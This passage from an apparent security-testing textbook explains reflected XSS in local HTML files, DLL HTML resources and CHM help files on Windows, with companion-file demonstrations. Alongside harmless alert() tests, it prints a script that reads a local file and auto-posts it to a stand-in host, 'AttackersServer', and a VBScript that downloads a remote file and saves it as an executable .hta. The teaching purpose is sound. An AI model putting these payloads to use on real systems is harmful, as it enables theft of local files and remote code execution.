On most systems, the operating system and applications install thousands of HTML files on the local hard disk, in addition to the temporary files used by the Web browser. These files are mostly used for product help and for templates that dynamically create UI inside an application. When people think of HTML files on the local hard disk, they mostly think of files with the .htm or .html extension. HTML files are also located inside other files. Windows binary files can contain HTML resources; this resource type allows HTML files to be stored inside the binary. Another place HTML files are located is inside Compiled Help Module (CHM) files, which have the .chm extension and are usually used for Help content.
These three types of files (.htm/.html files, HTML resources, and CHM files) can contain XSS bugs. In the reflected XSS examples discussed so far, the server has echoed attacker input in the HTML returned to the client. This is most commonly done by server-side scripting languages such as Perl, Active Server Pages (ASP), or PHP: Hypertext Preprocessor (PHP). Because local files are not run through a server-side script interpreter, how can a local HTML file contain a reflected XSS bug? The HTML file can contain script that rewrites its own contents and echoes user-supplied data.
Data sent to local HTML files will generally be sent through the URL. Forms using the POST method send the form variables in the body of the HTTP request. Because viewing HTML files on the local hard disk doesn't use HTTP, posting data to these files won't be very useful in testing. Data sent to local HTML files is usually sent by appending a question mark or hash mark (#) to the local HTML file's filename, followed by the data. Here's an example to clarify.
Load localHello.html (which you can find on the companion Web site) in your Web browser. After you enter the filename, insert the hash mark (#) followed by your name. As shown in Figure 10-9, your name will be visible in the local HTML file.
View the source of localHello.html. When you examine the source of the document, you see that the name entered after the hash mark isn't present. What's going on? Somehow the HTML contained the name, because it is displayed in the browser. This requires a closer look at the page's source (see Figure 10-10). The script in the page contains a variable named strName. This variable is set to the value of the browser's hash (location.hash), excluding the first character in location.hash. (The first character is always the hash mark, and the programmer of the page didn't want to echo that character.) Later in the script, the new contents are written to the HTML displayed (through the DOM) using the document.write method. In this case, Hello, Tom was written. The browser displays the modified HTML content, allowing you to see Hello, Tom in the browser window.
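The following is a minimal sketch of a page that behaves the way localHello.html is described here; the exact markup on the companion Web site may differ in its details:

<HTML>
<BODY>
<SCRIPT>
// Take everything after the first character of location.hash (the hash mark itself)...
var strName = location.hash.substring(1);
// ...and write it into the page through the DOM with no encoding or filtering.
document.write("Hello, " + strName);
</SCRIPT>
</BODY>
</HTML>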
With an understanding of the source code of this file, you know the untrusted data isn't encoded or filtered. Anything placed in the URL after the hash mark is echoed. The programmer likely didn't realize reflected XSS is possible through files on the local hard disk. Try sending in <SCRIPT>alert('Hi!')</SCRIPT> as the data following the hash mark. Bingo! Script runs.
Before we discuss why XSS bugs in local files are an issue, you must understand the first steps in exploiting these issues. For XSS bugs in Web servers, the attacker coerces the victim into navigating to a URL that contains the XSS bug. The attacker knows the full URL to the buggy page (for example, http://server/buggy.aspx). Everyone can access the page at the same URL. This is good for attackers because they will always know where to point the victim. Much like an XSS bug on a Web server, to exploit an XSS bug in a local file attackers must point the victim to the URL of the buggy file. Unfortunately for attackers, the URL containing the XSS bug varies from system to system; for example, on one machine it might be C:\SomeCoolProgram\buggy.html, but on another machine it might be something different, such as D:\SomeCoolProgram\buggy.html. The directory names might also be different. How can attackers deal with this? First, most users accept the default installation directory for a program. If a program suggests SomeCoolProgram as the install directory, most users will install to that directory. Also, most people install programs to the C drive. Information disclosure bugs, discussed in Chapter 7, Information Disclosure, might be used in combination with local XSS bugs to help attackers determine where buggy files live on a victim's hard disk.
Although there probably aren't cookies or user data issued for the local file system, an attacker can still cause harm by exploiting a local XSS bug, often more harm than an XSS bug in a Web application allows. Local XSS bugs enable an attacker's code to run in the My Computer zone, which has the most lax security settings; this is why attackers are quite happy when they discover a local XSS issue. Less security means more fun for attackers.
Remember that an XSS bug can access the DOM of all other pages for the same site. (If you missed it, this information is in the sidebar titled XSS Enables Actions That Are Normally Prohibited earlier in this chapter.) In the My Computer zone, there isn't a notion of domain or site. All of the My Computer zone is treated as the same entity, which means that any page in the My Computer zone can access any other page in this zone through the DOM (file system permissions still apply). Once in the My Computer zone, attackers can read other files on the local hard disk. Attackers need to know the path of a file they want to look into, but often this isn't a huge issue. Suppose there is a file on the victim's machine named C:\SecretPlans.txt, which contains secret plans. The following script grabs the contents of C:\SecretPlans.txt and displays it in a dialog box:
<SCRIPT>
var x=window.open('file://c:/SecretPlans.txt','myWindow');
while (x.document.readyState !='complete') ;
var strSecretText=x.document.body.innerText;
x.close();
alert(strSecretText);
</SCRIPT>
If someone with permissions to C:\SecretPlans.txt loads the preceding script, that script will have access to read the file. In the example of exploiting XSS bugs on servers, the contents of the victim's cookie were copied by appending the cookie's value to a URL pointing to the attacker's Web server. The same approach can be used to exploit local XSS bugs, too. However, there are two problems with appending the victim's data to a URL. First, because this uses the GET method, the data size is limited to the amount of data that can be contained in the URL. Second, if the victim happens to look in the browser history, the data would look extremely suspicious sitting in the address of a Web page on the attacker's server. Attackers would rather make victims' lives simple and not complicate them with such worries. An alternative to sending the data in the URL is to send it through an HTML form using an HTTP POST. Sending the data in this way is not limited to local XSS exploits; it can also be used in server XSS exploits, and in script injection exploits against local files (persistent XSS against local files).
To steal the contents of C:\SecretPlans.txt, an attacker can echo an HTML form and script through a page containing the reflected XSS flaw. The attacker-supplied script will fill out the form using the contents of C:\SecretPlans.txt and will automatically submit the form to the attacker's server. The resulting form and script will look something like this:
<FORM action="http://AttackersServer/redir.asp" name="myForm" method="POST">
<INPUT type="hidden" name="txtSecretText" id="idText">
</FORM>
<SCRIPT>
var x=window.open('file://c:/SecretPlans.txt','myWindow');
while (x.document.readyState !='complete') ;
idText.value=x.document.body.innerText;
x.close();
document.myForm.submit();
</SCRIPT>
To exploit the localHello.html example to copy the contents of C:\SecretPlans.txt from the victim's hard drive to the attacker's Web server, the attacker must coerce the victim to browse to the following URL:
C:\XSSDemos\localHello.html#<FORM action="http://AttackersServer/redir.asp" name="myForm" method="POST"><INPUT type="hidden" name="txtSecretText" id="idText"></FORM><SCRIPT>var x=window.open('file://c:/SecretPlans.txt','myWindow');while (x.document.readyState !='complete');idText.value=x.document.body.innerText;x.close();document.myForm.submit();</SCRIPT>
Tip | Depending on the security settings, Internet Explorer might display the Information bar warning the user that active content has been restricted. For this demonstration, you can click the Information bar and choose to allow the blocked content. As you'll see in the section titled Understanding How Internet Explorer Mitigates XSS Attacks against Local Files later in this chapter, this restriction doesn't always exist, and attackers have ways of working around it when it does exist. |
Internet Explorer zones | Internet Explorer loads content in one of the following zones (listed from most restrictive to least restrictive): Restricted sites, Internet, Local intranet, Trusted sites, and My Computer. |
Important | In Microsoft Windows XP Service Pack 2 (SP2), a more restrictive version of the My Computer zone is introduced. This new version locks down the My Computer zone and doesn't allow script or ActiveX controls to run. In Windows XP SP2 and later, there are two versions of the My Computer zone: the original version and the more restrictive version. This is discussed in the section titled Changes in Internet Explorer in Windows XP SP2 later in this chapter. |
Another fun thing about the My Computer zone is that several ActiveX controls normally blocked from the Internet can be called. Developers of these controls sometimes allow potentially dangerous functionality when the Web page calling the control is in the My Computer zone because they believe only trusted code should be in this zone. In theory, this is correct, but with a single local XSS or local script injection bug an attacker can call into the control.
Once attackers could run script in the My Computer zone, some controls were being used to run arbitrary code on victims' machines, so Microsoft added additional restrictions to controls that allowed dangerous behavior when called from the My Computer zone. One of these controls is Shell.Application, which contains an Open method that takes a parameter named vDir. The vDir parameter can be the path to an executable file such as an .exe file. When the Open method is invoked, the executable specified in vDir is launched.
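As a rough illustration (not the code from any particular exploit), script running in the original My Computer zone could call the Open method just described like this; the path to calc.exe is only an example target:

<SCRIPT>
// Creating this object from script works only where ActiveX creation is allowed,
// such as the original (pre-lockdown) My Computer zone; the Internet zone blocks it.
var oShell = new ActiveXObject("Shell.Application");
// Open takes vDir; when vDir points at an executable, the executable is launched.
oShell.Open("C:\\Windows\\System32\\calc.exe");
</SCRIPT>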
More Info | ActiveX controls called from HTML pose another set of security problems not discussed in this chapter. For more details and a more in-depth look at the ActiveX technology, see Chapter 18. |
At the time of this writing, the ADODB.Connection control (when hosted in the My Computer zone) can be used to write data to arbitrary files on the local hard disk. A person known as Http-equiv wrote code similar to the following script, which downloads http://www.example.com/remoteFile.txt and writes the contents locally as C:\localFile.hta (HTA files are HTML Applications, which have no security restrictions; HTA files should be regarded as similar to EXE files):
<script language="vbs">
'http://www.malware.com - 19.10.04
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
    "Dbq=http://www.example.com;" & _
    "Extensions=asc,csv,tab,txt;" & _
    "Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from remoteFile.txt", conn
rs.Save "C:\localFile.hta", adPersistXML
rs.close
conn.close
</script>
The HTA could be placed in the location of the attacker's choice. Placing it in the victim's startup group would result in execution the next time the victim logs on. More on Http-equiv's code is available in his mail to the Full-Disclosure mailing list (see http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027778.html).
Binary files can contain resources. Commonly used resources are bitmaps, cursors, dialog boxes, HTML, and string tables. HTMLResExample.dll, included on this book's companion Web site, is an example that contains an HTML resource. HTML resources can contain XSS bugs.
Programs usually call the LoadResource Windows API to retrieve the content of a resource. This API cannot be called through HTML script. The Windows operating system has a res pluggable protocol used to load HTML resources in Internet Explorer from arbitrary files. To read a resource from a file using the res protocol, the following syntax is used:
res://fileName[/resourceType]/resourceID.
The resourceType is optional; the default is type 23 (HTML). For example, the HTML resource named dnserror.htm in shdoclc.dll is displayed by visiting res://C:\Windows\System32\shdoclc.dll/dnserror.htm. You've probably seen this resource before; it is used by Internet Explorer when your browser encounters a DNS error. The bitmap resource named 533 in the same file can be viewed through res://C:\Windows\System32\shdoclc.dll/2/533, as shown in Figure 10-11. The full path to the resource file isn't required if it is located in the current path. For example, the bitmap resource in shdoclc.dll can also be loaded with the URL res://shdoclc.dll/2/533.
It turns out that HTML specified in resources can also be exploited by attackers and should be tested for local XSS attacks. The root cause of the vulnerability in the case of resources is identical to the problem exhibited in HTML files on the local file system. The only difference is how the buggy HTML is accessed: instead of getting the victim to browse directly to an HTML file on the local file system that contains an XSS bug, the attacker gets the victim to load an HTML resource that contains an XSS bug through the res pluggable protocol.
Many tools can be used to examine resources contained in binary files on the Windows platform. If you don't already have a program to examine resources, you can download Resource Hacker (http://angusj.com/resourcehacker/), which is a freeware utility whose sole purpose is viewing and manipulating resources. Microsoft Visual Studio, which might already be installed on your machine, can also be used. Visual Studio shows HTML resources under the HTML folder, but other programs (such as Resource Hacker) might show HTML resources under a folder named 23 (which is the internal ID for HTML resources defined in winuser.h).
Examining HTML resource 102 inside HTMLResExample.dll shows that its HTML is identical to the HTML in the previous example (localHello.html) except that the HTML is contained in the DLL. Because a simple URL to run script through localHello.html was file://D:/XSSDemos/localHello.html#<SCRIPT>alert("Hi!")</SCRIPT>, a URL to run simple script through HTMLResExample.dll is res://D:/XSSDemos/HTMLResExample.dll/102#<SCRIPT>alert("Hi!")</SCRIPT>. Now code is running in the My Computer zone!
Another type of file to test for local XSS bugs is the Compiled Help Module (CHM) file, which ends with the .chm extension. Compiled Help files are a set of HTML files bundled together in one CHM file. To examine the contents of a CHM for potential XSS bugs, dump its contents to disk. Microsoft has a free tool, called HTML Help Workshop, available from http://msdn.microsoft.com/library/en-us/htmlhelp/html/hwMicrosoftHTMLHelpDownloads.asp, that can be used either to create or decompile Compiled Help files. It can be used to decompile a CHM so that all of the individual files contained inside the CHM are easy to examine.
After you start HTML Help Workshop, select the Decompile option on the File menu to extract the individual HTML files. In the dialog box that appears, enter the name of the CHM and the directory where the decompiled contents of the CHM file should be stored.
Note | Use the CHMDemo.chm file included on the companion Web site to experiment with decompiling a CHM file. |
Look at the source of the three files extracted from CHMDemo.chm. The file named index.html doesn't seem very interesting because it contains only frames that point to the other two files. Look at SearchForm.html; this file is a little more interesting. It asks the user for a search term and has a Search button that contains an onclick event. When the button is clicked, the following script is executed:
parent.frames[1].location = "searchResults.htm#" + txtKeyword.value;
parent.frames[1].location.reload();
What can an attacker do with this? Although it might not immediately appear that there is anything interesting an attacker can do, notice that the pages are passing data to each other using the hash. The third and most interesting file contained in the CHM is searchResults.htm. This file contains the following HTML fragment:
var strKeyword = new String(location.hash);
strKeyword = strKeyword.substring(1);
document.open();
document.write ("<font face=\"Tahoma\" size=\"2\">");
if (location.hash == "")
{
    document.write ("Please enter a search term on the left and click \"Search\".");
}
else
{
    document.write ("Search results for \"");
    document.write (strKeyword);
    document.write ("\"<BR>No information about that topic.");
}
This page writes out the location.hash (minus the hash mark) as long as it isn't the empty string. There isn't any validation, so it should be possible to send script as the hash and have it run in the My Computer zone. But how can an attacker construct a URL that points to searchResults.htm inside the CHM?
Much like with HTML resources, there is a way to load a specific page of a CHM inside Internet Explorer by using a pluggable protocol. There are actually three pluggable protocols that provide this functionality: ms-its, its, and mk. The following are examples of how to run script through CHMDemo.chm using each pluggable protocol.
ms-its:c:\xss\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!');</SCRIPT>
its:c:\xss\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!');</SCRIPT>
mk:@MSITStore:C:\XSS\CHMDemo.chm::/searchResults.htm#<SCRIPT>alert('Hi!');</SCRIPT>
Unlike the examples in the beginning of this chapter, the HTML isn't being generated on the server and displayed on the client. The output is being generated on the client, and the input data will not appear in the HTML source. How can these bugs be found? The previous approach of looking for the input in the HTML source returned and trying to figure out how to get script to run won't work. It is necessary to review the client-side script. Client-side script mostly appears inside <script> tags or in files included by using the src attribute on the <script> tag. For example, <SCRIPT src="http://www.example.com/common.js"></SCRIPT> includes the code in common.js as if it were contained in the calling HTML page. Client-side script can be included in many other places, such as events on an HTML tag and HTML styles, but the most common is the <script> tag. By carefully looking at the client-side script, you will be able to identify XSS bugs in the code.
Note | It is important to note that client-side script generating output doesn't happen only in files installed on the local hard disk. Web sites can also contain client-side script that dynamically generates output and therefore can also contain XSS bugs in this category. An XSS bug in client-side script contained in a Web site will not run in the My Computer zone but instead will run in the security context of the site that referenced the script. For example, if www.example.com contained the previous example file localHello.html in the site (http://www.example.com/localHello.html), an attacker could get the victim to run script by coercing the victim to browse to http://www.example.com/localHello.html#<SCRIPT>alert('Hi!')</SCRIPT>. This example script isn't terribly interesting because it simply tells the victim Hi!, but it has access to anything example.com has access to through script. |
Although it is very difficult to make a complete list of all dangerous code that leads to an XSS condition, Table 10-3 describes a few elements you must investigate carefully if they are present in client-side script; a short sketch following the table illustrates some of these patterns.
Property | Description |
---|---|
Reading location.hash | This property contains any data after the page's URL following the hash mark (#). The data after the hash mark can be set to an arbitrary value. |
Reading location.search | This property contains any data after the page's URL following the question mark (?). The data after the question mark can be set to an arbitrary value. |
Reading document.location / location.href | Entire URL of the page. This property includes the location.search and location.hash. If a URL is http://www.example.com/foo.html?abc#123, the document.location includes the entire URL. The problem is that programmers only expect URLs like http://www.example.com/foo.html. The programmer assumes that the location.hash and location.search won't be present, or doesn't realize that they could be included in the document.location. Programmers might think that the data following the last forward slash of the URL is the name of the page. This isn't the case! Suppose there is a page containing script that dynamically redirects to another file inside a directory with the same name. For example, if the file was named test1.html, the redirection would be to test1/file.html. If the programmer of the page thought the last forward slash in the document.location was immediately before the name of the page and makes the redirection based on that logic, script can run. An attacker could force the victim to load C:\buggy.html#\javascript:alert("Hi!");/.html/. Then the victim would be redirected to javascript:alert("Hi!");///file.html and the attacker's code would run. |
Setting document.location | Resetting this property forces the browser to load a URL. If you can control this data, you might be able to get script to run by navigating to a URL that begins with a scripting protocol like javascript:alert("Hi!");. |
Setting outerHTML / innerHTML | These properties are used to rewrite parts of the DOM. If you can control the data that is being rewritten, you might be able to get script to run. |
Setting href / src | If the page dynamically sets the href or src of a tag, script can likely run by using a scripting protocol. The href and src are the most common attributes, but scripting protocols apply to most places that accept a URL as a value. |
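To make the table concrete, here is a minimal sketch of what some of these dangerous patterns look like in client-side script. The variable names and the idStatus element are hypothetical, each fragment is shown independently, and each one assumes the data is attacker controllable through the URL:

<SCRIPT>
// Reading location.search and echoing it without encoding: script after the ? runs.
var strQuery = location.search.substring(1);
document.write("You searched for: " + strQuery);

// Setting document.location from untrusted data: a javascript: URL runs script.
var strTarget = location.hash.substring(1);
document.location = strTarget;

// Setting innerHTML from untrusted data: injected tags become live HTML.
idStatus.innerHTML = "Results for " + strQuery;
</SCRIPT>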